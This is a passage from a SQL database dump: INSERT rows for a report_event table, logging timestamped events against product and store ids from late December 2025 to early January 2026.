(23987, '2025-12-27 21:30:15', 1, 2064, 0, 1, 1),
(23988, '2025-12-27 21:39:05', 1, 2059, 0, 1, 1),
(23989, '2025-12-27 22:48:58', 1, 2060, 0, 1, 1),
(23990, '2025-12-27 22:49:01', 1, 2060, 0, 1, 1),
(23991, '2025-12-27 22:57:50', 1, 2063, 0, 1, 1),
(23992, '2025-12-27 23:51:23', 1, 2060, 0, 1, 1),
(23993, '2025-12-27 23:51:26', 1, 2060, 0, 1, 1),
(23994, '2025-12-28 00:17:57', 1, 2060, 0, 1, 1),
(23995, '2025-12-28 00:54:40', 1, 2064, 0, 1, 1),
(23996, '2025-12-28 01:24:56', 1, 2054, 0, 1, 1),
(23997, '2025-12-28 01:30:14', 1, 2060, 0, 1, 1),
(23998, '2025-12-28 02:17:00', 1, 2054, 0, 1, 1),
(23999, '2025-12-28 03:06:25', 1, 2064, 0, 1, 1),
(24000, '2025-12-28 03:23:21', 1, 2054, 0, 1, 1),
(24001, '2025-12-28 03:29:04', 1, 2064, 0, 1, 1),
(24002, '2025-12-28 04:08:24', 1, 2059, 0, 1, 1),
(24003, '2025-12-28 05:47:49', 1, 2062, 0, 1, 1),
(24004, '2025-12-28 05:51:16', 1, 2062, 0, 1, 1),
(24005, '2025-12-28 06:21:13', 1, 2061, 0, 1, 1),
(24006, '2025-12-28 06:29:21', 1, 2058, 0, 1, 1),
(24007, '2025-12-28 06:33:42', 1, 2059, 0, 1, 1),
(24008, '2025-12-28 06:33:46', 1, 2060, 0, 1, 1),
(24009, '2025-12-28 06:38:22', 1, 2062, 0, 1, 1),
(24010, '2025-12-28 08:20:46', 1, 2064, 0, 1, 1),
(24011, '2025-12-28 08:20:49', 1, 2063, 0, 1, 1),
(24012, '2025-12-28 08:20:51', 1, 2062, 0, 1, 1),
(24013, '2025-12-28 08:20:53', 1, 2061, 0, 1, 1),
(24014, '2025-12-28 08:20:56', 1, 2060, 0, 1, 1),
(24015, '2025-12-28 08:20:58', 1, 2059, 0, 1, 1),
(24016, '2025-12-28 08:21:01', 1, 2058, 0, 1, 1),
(24017, '2025-12-28 08:21:03', 1, 2055, 0, 1, 1),
(24018, '2025-12-28 08:21:05', 1, 2054, 0, 1, 1),
(24019, '2025-12-28 11:24:16', 1, 2053, 0, 1, 1),
(24020, '2025-12-28 11:46:42', 1, 2055, 0, 1, 1),
(24021, '2025-12-28 13:03:38', 1, 2064, 0, 1, 1),
(24022, '2025-12-28 13:14:27', 1, 2055, 0, 1, 1),
(24023, '2025-12-28 13:24:11', 1, 2054, 0, 1, 1),
(24024, '2025-12-28 13:43:02', 1, 2055, 0, 1, 1),
(24025, '2025-12-28 13:48:03', 1, 2060, 0, 1, 1),
(24026, '2025-12-28 13:53:05', 1, 2064, 0, 1, 1),
(24027, '2025-12-28 16:06:52', 1, 2060, 0, 1, 1),
(24028, '2025-12-28 16:20:48', 1, 2062, 0, 1, 1),
(24029, '2025-12-28 16:21:20', 1, 2062, 0, 1, 1),
(24030, '2025-12-28 16:57:31', 1, 2054, 0, 1, 1),
(24031, '2025-12-28 17:01:09', 1, 2064, 0, 1, 1),
(24032, '2025-12-28 17:27:16', 1, 2062, 0, 1, 1),
(24033, '2025-12-28 17:27:38', 1, 2062, 0, 1, 1),
(24034, '2025-12-28 17:32:13', 1, 2064, 0, 1, 1),
(24035, '2025-12-28 17:32:16', 1, 2063, 0, 1, 1),
(24036, '2025-12-28 17:32:19', 1, 2062, 0, 1, 1),
(24037, '2025-12-28 17:32:22', 1, 2061, 0, 1, 1),
(24038, '2025-12-28 17:32:25', 1, 2060, 0, 1, 1),
(24039, '2025-12-28 17:32:26', 1, 2054, 0, 1, 1),
(24040, '2025-12-28 17:32:27', 1, 2059, 0, 1, 1),
(24041, '2025-12-28 19:04:18', 1, 2064, 0, 1, 1),
(24042, '2025-12-28 20:08:31', 1, 2063, 0, 1, 1),
(24043, '2025-12-28 20:55:39', 1, 2064, 0, 1, 1),
(24044, '2025-12-28 21:02:31', 1, 2053, 0, 1, 1),
(24045, '2025-12-28 21:37:51', 1, 2064, 0, 1, 1),
(24046, '2025-12-28 21:48:21', 1, 2064, 0, 1, 1),
(24047, '2025-12-28 22:01:13', 1, 2061, 0, 1, 1),
(24048, '2025-12-28 23:03:24', 1, 2054, 0, 1, 1),
(24049, '2025-12-29 00:49:57', 1, 2060, 0, 1, 1),
(24050, '2025-12-29 01:34:10', 1, 2053, 0, 1, 1),
(24051, '2025-12-29 03:45:09', 1, 2058, 0, 1, 1),
(24052, '2025-12-29 03:45:15', 1, 2062, 0, 1, 1),
(24053, '2025-12-29 03:45:17', 1, 2061, 0, 1, 1),
(24054, '2025-12-29 03:46:01', 1, 2059, 0, 1, 1),
(24055, '2025-12-29 03:46:10', 1, 2063, 0, 1, 1),
(24056, '2025-12-29 04:03:22', 1, 2059, 0, 1, 1),
(24057, '2025-12-29 05:20:34', 1, 2058, 0, 1, 1),
(24058, '2025-12-29 05:32:04', 1, 2064, 0, 1, 1),
(24059, '2025-12-29 07:23:50', 1, 2054, 0, 1, 1),
(24060, '2025-12-29 08:57:23', 1, 2060, 0, 1, 1),
(24061, '2025-12-29 09:18:24', 1, 2054, 0, 1, 1),
(24062, '2025-12-29 10:25:14', 1, 2062, 0, 1, 1),
(24063, '2025-12-29 12:37:01', 1, 2054, 0, 1, 1),
(24064, '2025-12-29 12:41:24', 1, 2054, 0, 1, 1),
(24065, '2025-12-29 12:50:58', 1, 2064, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(24066, '2025-12-29 15:16:10', 1, 2064, 0, 1, 1),
(24067, '2025-12-29 16:02:48', 1, 2064, 0, 1, 1),
(24068, '2025-12-29 16:26:30', 1, 2062, 0, 1, 1),
(24069, '2025-12-29 16:43:35', 1, 2055, 0, 1, 1),
(24070, '2025-12-29 16:44:26', 1, 2062, 0, 1, 1),
(24071, '2025-12-29 16:44:54', 1, 2062, 0, 1, 1),
(24072, '2025-12-29 18:26:47', 1, 2060, 0, 1, 1),
(24073, '2025-12-29 18:30:50', 1, 2064, 0, 1, 1),
(24074, '2025-12-29 18:54:11', 1, 2053, 0, 1, 1),
(24075, '2025-12-29 19:00:28', 1, 2063, 0, 1, 1),
(24076, '2025-12-29 19:03:02', 1, 2055, 0, 1, 1),
(24077, '2025-12-29 19:03:11', 1, 2062, 0, 1, 1),
(24078, '2025-12-29 19:03:59', 1, 2064, 0, 1, 1),
(24079, '2025-12-29 19:53:54', 1, 2054, 0, 1, 1),
(24080, '2025-12-29 19:53:58', 1, 2058, 0, 1, 1),
(24081, '2025-12-29 22:18:06', 1, 2055, 0, 1, 1),
(24082, '2025-12-29 22:21:45', 1, 2054, 0, 1, 1),
(24083, '2025-12-29 22:47:55', 1, 2060, 0, 1, 1),
(24084, '2025-12-29 22:56:10', 1, 2060, 0, 1, 1),
(24085, '2025-12-29 23:14:35', 1, 2064, 0, 1, 1),
(24086, '2025-12-30 00:35:32', 1, 2054, 0, 1, 1),
(24087, '2025-12-30 01:09:25', 1, 2054, 0, 1, 1),
(24088, '2025-12-30 01:36:38', 1, 2060, 0, 1, 1),
(24089, '2025-12-30 01:50:43', 1, 2053, 0, 1, 1),
(24090, '2025-12-30 02:49:22', 1, 2061, 0, 1, 1),
(24091, '2025-12-30 03:45:24', 1, 2063, 0, 1, 1),
(24092, '2025-12-30 05:36:05', 1, 2064, 0, 1, 1),
(24093, '2025-12-30 05:57:18', 1, 2064, 0, 1, 1),
(24094, '2025-12-30 06:12:40', 1, 2062, 0, 1, 1),
(24095, '2025-12-30 07:09:31', 1, 2060, 0, 1, 1),
(24096, '2025-12-30 07:24:10', 1, 2061, 0, 1, 1),
(24097, '2025-12-30 07:24:10', 1, 2061, 0, 1, 1),
(24098, '2025-12-30 09:52:48', 1, 2054, 0, 1, 1),
(24099, '2025-12-30 09:57:50', 1, 2063, 0, 1, 1),
(24100, '2025-12-30 13:47:55', 1, 2060, 0, 1, 1),
(24101, '2025-12-30 14:26:10', 1, 2064, 0, 1, 1),
(24102, '2025-12-30 15:53:48', 1, 2060, 0, 1, 1),
(24103, '2025-12-30 15:54:41', 1, 2054, 0, 1, 1),
(24104, '2025-12-30 16:21:38', 1, 2060, 0, 1, 1),
(24105, '2025-12-30 16:24:21', 1, 2062, 0, 1, 1),
(24106, '2025-12-30 16:25:08', 1, 2062, 0, 1, 1),
(24107, '2025-12-30 17:30:32', 1, 2062, 0, 1, 1),
(24108, '2025-12-30 17:31:54', 1, 2064, 0, 1, 1),
(24109, '2025-12-30 17:34:59', 1, 2054, 0, 1, 1),
(24110, '2025-12-30 18:19:41', 1, 2064, 0, 1, 1),
(24111, '2025-12-30 19:10:32', 1, 2054, 0, 1, 1),
(24112, '2025-12-30 20:02:49', 1, 2060, 0, 1, 1),
(24113, '2025-12-30 20:37:50', 1, 2063, 0, 1, 1),
(24114, '2025-12-30 22:33:20', 1, 2062, 0, 1, 1),
(24115, '2025-12-30 22:54:09', 1, 2059, 0, 1, 1),
(24116, '2025-12-30 23:21:53', 1, 2060, 0, 1, 1),
(24117, '2025-12-30 23:58:20', 1, 2064, 0, 1, 1),
(24118, '2025-12-31 00:05:41', 1, 2064, 0, 1, 1),
(24119, '2025-12-31 00:09:37', 1, 2061, 0, 1, 1),
(24120, '2025-12-31 01:19:38', 1, 2054, 0, 1, 1),
(24121, '2025-12-31 05:18:31', 1, 2058, 0, 1, 1),
(24122, '2025-12-31 07:31:48', 1, 2053, 0, 1, 1),
(24123, '2025-12-31 08:49:13', 1, 2062, 0, 1, 1),
(24124, '2025-12-31 09:03:57', 1, 2060, 0, 1, 1),
(24125, '2025-12-31 09:03:59', 1, 2060, 0, 1, 1),
(24126, '2025-12-31 09:24:34', 1, 2060, 0, 1, 1),
(24127, '2025-12-31 10:11:19', 1, 2061, 0, 1, 1),
(24128, '2025-12-31 10:11:49', 1, 2059, 0, 1, 1),
(24129, '2025-12-31 10:12:13', 1, 2058, 0, 1, 1),
(24130, '2025-12-31 10:12:17', 1, 2063, 0, 1, 1),
(24131, '2025-12-31 10:38:17', 1, 2060, 0, 1, 1),
(24132, '2025-12-31 10:38:20', 1, 2060, 0, 1, 1),
(24133, '2025-12-31 11:13:19', 1, 2061, 0, 1, 1),
(24134, '2025-12-31 13:18:27', 1, 2054, 0, 1, 1),
(24135, '2025-12-31 14:12:06', 1, 2054, 0, 1, 1),
(24136, '2025-12-31 15:05:54', 1, 2054, 0, 1, 1),
(24137, '2025-12-31 15:11:36', 1, 2060, 0, 1, 1),
(24138, '2025-12-31 15:32:38', 1, 2064, 0, 1, 1),
(24139, '2025-12-31 16:50:31', 1, 2062, 0, 1, 1),
(24140, '2025-12-31 17:08:33', 1, 2064, 0, 1, 1),
(24141, '2025-12-31 17:48:22', 1, 2059, 0, 1, 1),
(24142, '2025-12-31 18:05:50', 1, 2064, 0, 1, 1),
(24143, '2025-12-31 18:22:05', 1, 2059, 0, 1, 1),
(24144, '2025-12-31 18:23:45', 1, 2062, 0, 1, 1),
(24145, '2025-12-31 18:25:13', 1, 2064, 0, 1, 1),
(24146, '2025-12-31 19:28:43', 1, 2060, 0, 1, 1),
(24147, '2025-12-31 21:58:50', 1, 2061, 0, 1, 1),
(24148, '2025-12-31 22:55:19', 1, 2058, 0, 1, 1),
(24149, '2026-01-01 00:09:04', 1, 2054, 0, 1, 1),
(24150, '2026-01-01 00:27:17', 1, 2060, 0, 1, 1),
(24151, '2026-01-01 01:02:47', 1, 2064, 0, 1, 1),
(24152, '2026-01-01 01:09:33', 1, 2060, 0, 1, 1),
(24153, '2026-01-01 01:53:33', 1, 2054, 0, 1, 1),
(24154, '2026-01-01 03:07:09', 1, 2053, 0, 1, 1),
(24155, '2026-01-01 03:08:28', 1, 2063, 0, 1, 1),
(24156, '2026-01-01 03:08:48', 1, 2055, 0, 1, 1),
(24157, '2026-01-01 03:08:50', 1, 2062, 0, 1, 1),
(24158, '2026-01-01 03:09:01', 1, 2064, 0, 1, 1),
(24159, '2026-01-01 03:34:43', 1, 2061, 0, 1, 1),
(24160, '2026-01-01 03:47:58', 1, 2055, 0, 1, 1),
(24161, '2026-01-01 03:55:25', 1, 2054, 0, 1, 1),
(24162, '2026-01-01 06:55:16', 1, 2055, 0, 1, 1),
(24163, '2026-01-01 09:18:45', 1, 2060, 0, 1, 1),
(24164, '2026-01-01 10:13:44', 1, 2054, 0, 1, 1),
(24165, '2026-01-01 10:23:59', 1, 2058, 0, 1, 1),
(24166, '2026-01-01 11:00:20', 1, 2053, 0, 1, 1),
(24167, '2026-01-01 11:14:59', 1, 2060, 0, 1, 1),
(24168, '2026-01-01 11:35:46', 1, 2064, 0, 1, 1),
(24169, '2026-01-01 11:58:41', 1, 2060, 0, 1, 1),
(24170, '2026-01-01 12:34:45', 1, 2054, 0, 1, 1),
(24171, '2026-01-01 13:45:06', 1, 2064, 0, 1, 1),
(24172, '2026-01-01 14:10:21', 1, 2054, 0, 1, 1),
(24173, '2026-01-01 14:22:05', 1, 2064, 0, 1, 1),
(24174, '2026-01-01 15:41:01', 1, 2064, 0, 1, 1),
(24175, '2026-01-01 17:02:06', 1, 2062, 0, 1, 1),
(24176, '2026-01-01 17:02:35', 1, 2062, 0, 1, 1),
(24177, '2026-01-01 20:56:18', 1, 2064, 0, 1, 1),
(24178, '2026-01-01 22:43:10', 1, 2062, 0, 1, 1),
(24179, '2026-01-01 22:43:15', 1, 2061, 0, 1, 1),
(24180, '2026-01-01 22:43:22', 1, 2063, 0, 1, 1),
(24181, '2026-01-02 02:50:59', 1, 2054, 0, 1, 1),
(24182, '2026-01-02 03:36:36', 1, 2060, 0, 1, 1),
(24183, '2026-01-02 05:36:10', 1, 2064, 0, 1, 1),
(24184, '2026-01-02 06:05:07', 1, 2054, 0, 1, 1),
(24185, '2026-01-02 07:14:55', 1, 2062, 0, 1, 1),
(24186, '2026-01-02 08:02:25', 1, 2053, 0, 1, 1),
(24187, '2026-01-02 10:09:18', 1, 2058, 0, 1, 1),
(24188, '2026-01-02 10:31:03', 1, 2054, 0, 1, 1),
(24189, '2026-01-02 10:53:01', 1, 2064, 0, 1, 1),
(24190, '2026-01-02 11:13:02', 1, 2059, 0, 1, 1),
(24191, '2026-01-02 12:25:07', 4, 2061, 5790, 1, 1),
(24192, '2026-01-02 12:38:53', 1, 2060, 0, 1, 1),
(24193, '2026-01-02 13:10:22', 1, 2064, 0, 1, 1),
(24194, '2026-01-02 13:55:10', 1, 2062, 0, 1, 1),
(24195, '2026-01-02 13:57:43', 1, 2060, 0, 1, 1),
(24196, '2026-01-02 13:58:55', 1, 2054, 0, 1, 1),
(24197, '2026-01-02 15:18:13', 1, 2062, 0, 1, 1),
(24198, '2026-01-02 16:18:49', 1, 2059, 0, 1, 1),
(24199, '2026-01-02 16:20:59', 1, 2062, 0, 1, 1),
(24200, '2026-01-02 16:21:09', 1, 2061, 0, 1, 1),
(24201, '2026-01-02 16:22:07', 1, 2058, 0, 1, 1),
(24202, '2026-01-02 16:22:16', 1, 2063, 0, 1, 1),
(24203, '2026-01-02 16:38:25', 1, 2064, 0, 1, 1),
(24204, '2026-01-02 18:41:46', 1, 2058, 0, 1, 1),
(24205, '2026-01-02 18:46:08', 1, 2054, 0, 1, 1),
(24206, '2026-01-02 18:53:15', 1, 2062, 0, 1, 1),
(24207, '2026-01-02 19:23:04', 1, 2060, 0, 1, 1),
(24208, '2026-01-02 19:31:51', 1, 2064, 0, 1, 1),
(24209, '2026-01-02 21:44:55', 1, 2054, 0, 1, 1),
(24210, '2026-01-02 21:49:22', 1, 2062, 0, 1, 1),
(24211, '2026-01-02 22:55:00', 1, 2061, 0, 1, 1),
(24212, '2026-01-02 23:16:00', 4, 2061, 5807, 1, 1),
(24213, '2026-01-02 23:44:49', 1, 2054, 0, 1, 1),
(24214, '2026-01-03 00:07:36', 1, 2054, 0, 1, 1),
(24215, '2026-01-03 00:43:00', 1, 2064, 0, 1, 1),
(24216, '2026-01-03 02:04:07', 1, 2060, 0, 1, 1),
(24217, '2026-01-03 05:43:19', 1, 2054, 0, 1, 1),
(24218, '2026-01-03 06:47:26', 1, 2060, 0, 1, 1),
(24219, '2026-01-03 06:47:30', 1, 2059, 0, 1, 1),
(24220, '2026-01-03 07:29:26', 1, 2064, 0, 1, 1),
(24221, '2026-01-03 07:37:51', 1, 2063, 0, 1, 1),
(24222, '2026-01-03 11:01:48', 1, 2053, 0, 1, 1),
(24223, '2026-01-03 11:02:46', 1, 2064, 5817, 1, 1),
(24224, '2026-01-03 11:02:48', 1, 2063, 0, 1, 1),
(24225, '2026-01-03 11:05:47', 1, 2055, 0, 1, 1),
(24226, '2026-01-03 11:06:19', 1, 2062, 0, 1, 1),
(24227, '2026-01-03 11:11:29', 1, 2064, 0, 1, 1),
(24228, '2026-01-03 11:38:09', 1, 2064, 0, 1, 1),
(24229, '2026-01-03 11:38:19', 1, 2064, 0, 1, 1),
(24230, '2026-01-03 12:13:59', 1, 2060, 0, 1, 1),
(24231, '2026-01-03 12:22:10', 1, 2055, 0, 1, 1),
(24232, '2026-01-03 12:30:54', 1, 2064, 0, 1, 1),
(24233, '2026-01-03 12:36:56', 1, 2054, 0, 1, 1),
(24234, '2026-01-03 13:08:10', 1, 2053, 0, 1, 1),
(24235, '2026-01-03 13:30:45', 1, 2061, 0, 1, 1),
(24236, '2026-01-03 14:17:36', 1, 2054, 0, 1, 1),
(24237, '2026-01-03 14:34:38', 1, 2064, 0, 1, 1),
(24238, '2026-01-03 15:01:38', 1, 2060, 0, 1, 1),
(24239, '2026-01-03 15:01:40', 1, 2060, 0, 1, 1),
(24240, '2026-01-03 16:18:45', 1, 2060, 0, 1, 1),
(24241, '2026-01-03 16:18:49', 1, 2060, 0, 1, 1),
(24242, '2026-01-03 16:44:15', 1, 2064, 0, 1, 1),
(24243, '2026-01-03 17:01:56', 1, 2062, 0, 1, 1),
(24244, '2026-01-03 17:02:21', 1, 2062, 0, 1, 1),
(24245, '2026-01-03 17:09:43', 1, 2062, 0, 1, 1),
(24246, '2026-01-03 17:11:03', 1, 2064, 0, 1, 1),
(24247, '2026-01-03 17:11:04', 1, 2060, 0, 1, 1),
(24248, '2026-01-03 18:31:04', 1, 2054, 0, 1, 1),
(24249, '2026-01-03 19:32:09', 1, 2060, 0, 1, 1),
(24250, '2026-01-03 22:16:37', 1, 2064, 0, 1, 1),
(24251, '2026-01-03 22:44:29', 1, 2059, 0, 1, 1),
(24252, '2026-01-03 23:05:45', 1, 2061, 0, 1, 1),
(24253, '2026-01-03 23:15:21', 1, 2058, 0, 1, 1),
(24254, '2026-01-03 23:32:44', 1, 2055, 0, 1, 1),
(24255, '2026-01-04 00:43:17', 1, 2060, 0, 1, 1),
(24256, '2026-01-04 03:11:31', 1, 2064, 0, 1, 1),
(24257, '2026-01-04 03:40:15', 1, 2054, 0, 1, 1),
(24258, '2026-01-04 05:40:48', 1, 2060, 0, 1, 1),
(24259, '2026-01-04 05:51:04', 1, 2054, 0, 1, 1),
(24260, '2026-01-04 05:55:31', 1, 2061, 0, 1, 1),
(24261, '2026-01-04 05:56:11', 1, 2058, 0, 1, 1),
(24262, '2026-01-04 05:56:31', 1, 2060, 0, 1, 1),
(24263, '2026-01-04 05:56:50', 1, 2062, 0, 1, 1),
(24264, '2026-01-04 05:57:10', 1, 2059, 0, 1, 1),
(24265, '2026-01-04 06:03:08', 1, 2063, 0, 1, 1),
(24266, '2026-01-04 06:07:18', 1, 2064, 0, 1, 1),
(24267, '2026-01-04 06:07:38', 1, 2054, 0, 1, 1),
(24268, '2026-01-04 06:08:18', 1, 2055, 0, 1, 1),
(24269, '2026-01-04 07:21:52', 1, 2055, 0, 1, 1),
(24270, '2026-01-04 07:30:59', 1, 2054, 0, 1, 1),
(24271, '2026-01-04 07:32:02', 1, 2058, 0, 1, 1),
(24272, '2026-01-04 07:57:22', 1, 2053, 0, 1, 1),
(24273, '2026-01-04 08:06:22', 1, 2053, 0, 1, 1),
(24274, '2026-01-04 08:53:50', 1, 2064, 0, 1, 1),
(24275, '2026-01-04 10:26:44', 1, 2060, 0, 1, 1),
(24276, '2026-01-04 11:59:16', 1, 2061, 0, 1, 1),
(24277, '2026-01-04 11:59:17', 1, 2061, 0, 1, 1),
(24278, '2026-01-04 13:55:36', 1, 2062, 0, 1, 1),
(24279, '2026-01-04 13:59:50', 1, 2054, 0, 1, 1),
(24280, '2026-01-04 14:22:58', 1, 2059, 0, 1, 1),
(24281, '2026-01-04 14:38:44', 1, 2062, 0, 1, 1),
(24282, '2026-01-04 15:01:17', 1, 2060, 0, 1, 1),
(24283, '2026-01-04 15:08:25', 1, 2063, 0, 1, 1),
(24284, '2026-01-04 15:26:41', 1, 2058, 0, 1, 1),
(24285, '2026-01-04 16:04:00', 1, 2055, 0, 1, 1),
(24286, '2026-01-04 16:47:48', 1, 2062, 0, 1, 1),
(24287, '2026-01-04 16:48:43', 1, 2062, 0, 1, 1),
(24288, '2026-01-04 17:02:52', 1, 2061, 0, 1, 1),
(24289, '2026-01-04 17:24:01', 1, 2059, 0, 1, 1),
(24290, '2026-01-04 17:24:09', 1, 2062, 0, 1, 1),
(24291, '2026-01-04 17:24:11', 1, 2061, 0, 1, 1),
(24292, '2026-01-04 17:25:02', 1, 2058, 0, 1, 1),
(24293, '2026-01-04 17:25:25', 1, 2063, 0, 1, 1),
(24294, '2026-01-04 17:30:22', 1, 2064, 0, 1, 1),
(24295, '2026-01-04 17:32:11', 1, 2062, 0, 1, 1),
(24296, '2026-01-04 17:33:22', 1, 2060, 0, 1, 1),
(24297, '2026-01-04 17:53:09', 1, 2064, 0, 1, 1),
(24298, '2026-01-04 18:09:29', 1, 2060, 0, 1, 1),
(24299, '2026-01-04 18:22:03', 1, 2060, 0, 1, 1),
(24300, '2026-01-04 18:28:08', 1, 2063, 0, 1, 1),
(24301, '2026-01-04 18:43:50', 1, 2058, 0, 1, 1),
(24302, '2026-01-04 19:10:10', 1, 2054, 0, 1, 1),
(24303, '2026-01-04 19:14:54', 1, 2055, 0, 1, 1),
(24304, '2026-01-04 20:05:15', 1, 2061, 0, 1, 1),
(24305, '2026-01-04 20:32:09', 1, 2062, 0, 1, 1),
(24306, '2026-01-04 20:48:47', 1, 2061, 0, 1, 1),
(24307, '2026-01-04 21:15:26', 1, 2054, 0, 1, 1),
(24308, '2026-01-04 21:16:51', 1, 2054, 0, 1, 1),
(24309, '2026-01-04 21:17:04', 1, 2064, 0, 1, 1),
(24310, '2026-01-04 21:24:01', 1, 2055, 0, 1, 1),
(24311, '2026-01-04 21:25:33', 1, 2054, 0, 1, 1),
(24312, '2026-01-04 21:31:16', 1, 2059, 0, 1, 1),
(24313, '2026-01-04 21:37:33', 1, 2059, 0, 1, 1),
(24314, '2026-01-04 21:47:09', 1, 2064, 0, 1, 1),
(24315, '2026-01-04 21:59:39', 1, 2054, 0, 1, 1),
(24316, '2026-01-05 00:06:18', 1, 2055, 0, 1, 1),
(24317, '2026-01-05 00:57:05', 1, 2061, 0, 1, 1),
(24318, '2026-01-05 01:28:26', 1, 2055, 0, 1, 1),
(24319, '2026-01-05 05:33:22', 1, 2060, 0, 1, 1),
(24320, '2026-01-05 05:34:34', 1, 2061, 0, 1, 1),
(24321, '2026-01-05 06:16:17', 1, 2054, 0, 1, 1),
(24322, '2026-01-05 06:59:45', 1, 2064, 0, 1, 1),
(24323, '2026-01-05 08:29:22', 1, 2064, 0, 1, 1),
(24324, '2026-01-05 11:32:52', 1, 2054, 0, 1, 1),
(24325, '2026-01-05 12:37:03', 1, 2060, 0, 1, 1),
(24326, '2026-01-05 12:52:55', 1, 2060, 0, 1, 1),
(24327, '2026-01-05 13:07:46', 1, 2054, 0, 1, 1),
(24328, '2026-01-05 17:04:47', 1, 2062, 0, 1, 1),
(24329, '2026-01-05 17:05:17', 1, 2062, 0, 1, 1),
(24330, '2026-01-05 17:42:50', 1, 2064, 0, 1, 1),
(24331, '2026-01-05 18:57:25', 1, 2053, 0, 1, 1),
(24332, '2026-01-05 18:57:28', 1, 2064, 0, 1, 1),
(24333, '2026-01-05 18:58:10', 1, 2055, 0, 1, 1),
(24334, '2026-01-05 19:00:02', 1, 2063, 0, 1, 1),
(24335, '2026-01-05 19:01:28', 1, 2062, 0, 1, 1),
(24336, '2026-01-05 19:33:21', 1, 2064, 0, 1, 1),
(24337, '2026-01-05 19:39:46', 1, 2054, 0, 1, 1),
(24338, '2026-01-05 19:39:51', 1, 2058, 0, 1, 1),
(24339, '2026-01-05 21:05:43', 1, 2060, 0, 1, 1),
(24340, '2026-01-05 21:15:26', 1, 2061, 0, 1, 1),
(24341, '2026-01-05 21:46:46', 1, 2060, 0, 1, 1),
(24342, '2026-01-05 21:47:01', 1, 2054, 0, 1, 1),
(24343, '2026-01-05 22:19:21', 1, 2060, 0, 1, 1),
(24344, '2026-01-05 23:33:10', 1, 2064, 0, 1, 1),
(24345, '2026-01-05 23:37:43', 1, 2054, 0, 1, 1),
(24346, '2026-01-05 23:44:15', 1, 2053, 0, 1, 1),
(24347, '2026-01-06 01:59:18', 1, 2053, 0, 1, 1),
(24348, '2026-01-06 02:58:43', 1, 2054, 0, 1, 1),
(24349, '2026-01-06 04:21:47', 1, 2054, 0, 1, 1),
(24350, '2026-01-06 04:28:24', 1, 2064, 0, 1, 1),
(24351, '2026-01-06 04:34:34', 1, 2060, 0, 1, 1),
(24352, '2026-01-06 05:21:59', 1, 2062, 0, 1, 1),
(24353, '2026-01-06 05:22:05', 1, 2062, 0, 1, 1),
(24354, '2026-01-06 06:01:59', 1, 2061, 0, 1, 1),
(24355, '2026-01-06 07:16:33', 1, 2062, 0, 1, 1),
(24356, '2026-01-06 08:15:19', 1, 2053, 0, 1, 1),
(24357, '2026-01-06 08:42:01', 1, 2060, 0, 1, 1),
(24358, '2026-01-06 09:38:31', 1, 2055, 0, 1, 1),
(24359, '2026-01-06 10:49:42', 1, 2064, 0, 1, 1),
(24360, '2026-01-06 11:46:55', 1, 2054, 0, 1, 1),
(24361, '2026-01-06 12:19:27', 1, 2060, 0, 1, 1),
(24362, '2026-01-06 12:25:27', 1, 2064, 0, 1, 1),
(24363, '2026-01-06 13:42:51', 1, 2060, 0, 1, 1),
(24364, '2026-01-06 14:28:22', 1, 2060, 0, 1, 1),
(24365, '2026-01-06 14:33:36', 1, 2060, 0, 1, 1),
(24366, '2026-01-06 14:33:38', 1, 2060, 0, 1, 1),
(24367, '2026-01-06 15:39:33', 1, 2058, 0, 1, 1),
(24368, '2026-01-06 15:59:26', 1, 2060, 0, 1, 1),
(24369, '2026-01-06 15:59:28', 1, 2060, 0, 1, 1),
(24370, '2026-01-06 16:00:35', 1, 2061, 0, 1, 1),
(24371, '2026-01-06 17:50:15', 1, 2064, 0, 1, 1),
(24372, '2026-01-06 18:16:38', 1, 2054, 0, 1, 1),
(24373, '2026-01-06 18:37:36', 1, 2062, 0, 1, 1),
(24374, '2026-01-06 18:39:06', 1, 2064, 0, 1, 1),
(24375, '2026-01-06 21:47:37', 1, 2061, 0, 1, 1),
(24376, '2026-01-06 23:15:32', 1, 2059, 0, 1, 1),
(24377, '2026-01-07 00:01:21', 1, 2060, 0, 1, 1),
(24378, '2026-01-07 00:04:17', 1, 2059, 0, 1, 1),
(24379, '2026-01-07 00:05:26', 1, 2062, 0, 1, 1),
(24380, '2026-01-07 00:09:07', 1, 2061, 0, 1, 1),
(24381, '2026-01-07 00:13:31', 1, 2058, 0, 1, 1),
(24382, '2026-01-07 00:14:05', 1, 2063, 0, 1, 1),
(24383, '2026-01-07 01:09:01', 1, 2054, 0, 1, 1),
(24384, '2026-01-07 01:37:18', 1, 2064, 0, 1, 1),
(24385, '2026-01-07 02:09:09', 1, 2064, 0, 1, 1),
(24386, '2026-01-07 02:18:14', 1, 2064, 0, 1, 1),
(24387, '2026-01-07 02:24:16', 1, 2054, 0, 1, 1),
(24388, '2026-01-07 02:24:18', 1, 2055, 0, 1, 1),
(24389, '2026-01-07 02:24:23', 1, 2064, 0, 1, 1),
(24390, '2026-01-07 02:24:25', 1, 2063, 0, 1, 1),
(24391, '2026-01-07 02:24:26', 1, 2062, 0, 1, 1),
(24392, '2026-01-07 02:24:28', 1, 2060, 0, 1, 1),
(24393, '2026-01-07 02:24:30', 1, 2059, 0, 1, 1),
(24394, '2026-01-07 02:24:32', 1, 2061, 0, 1, 1),
(24395, '2026-01-07 02:24:34', 1, 2058, 0, 1, 1),
(24396, '2026-01-07 02:51:09', 1, 2062, 0, 1, 1),
(24397, '2026-01-07 03:02:41', 1, 2063, 0, 1, 1),
(24398, '2026-01-07 03:05:36', 1, 2054, 0, 1, 1),
(24399, '2026-01-07 03:07:48', 1, 2054, 0, 1, 1),
(24400, '2026-01-07 03:12:57', 1, 2060, 0, 1, 1),
(24401, '2026-01-07 03:24:17', 1, 2059, 0, 1, 1),
(24402, '2026-01-07 05:19:18', 1, 2062, 0, 1, 1),
(24403, '2026-01-07 05:27:00', 1, 2060, 0, 1, 1),
(24404, '2026-01-07 06:10:09', 1, 2054, 0, 1, 1),
(24405, '2026-01-07 08:29:21', 1, 2062, 0, 1, 1),
(24406, '2026-01-07 14:55:23', 1, 2054, 0, 1, 1),
(24407, '2026-01-07 15:29:25', 1, 2060, 0, 1, 1),
(24408, '2026-01-07 15:31:30', 1, 2064, 0, 1, 1),
(24409, '2026-01-07 15:37:18', 1, 2054, 0, 1, 1),
(24410, '2026-01-07 16:02:47', 1, 2060, 0, 1, 1),
(24411, '2026-01-07 16:13:36', 1, 2064, 0, 1, 1),
(24412, '2026-01-07 16:55:27', 1, 2062, 0, 1, 1),
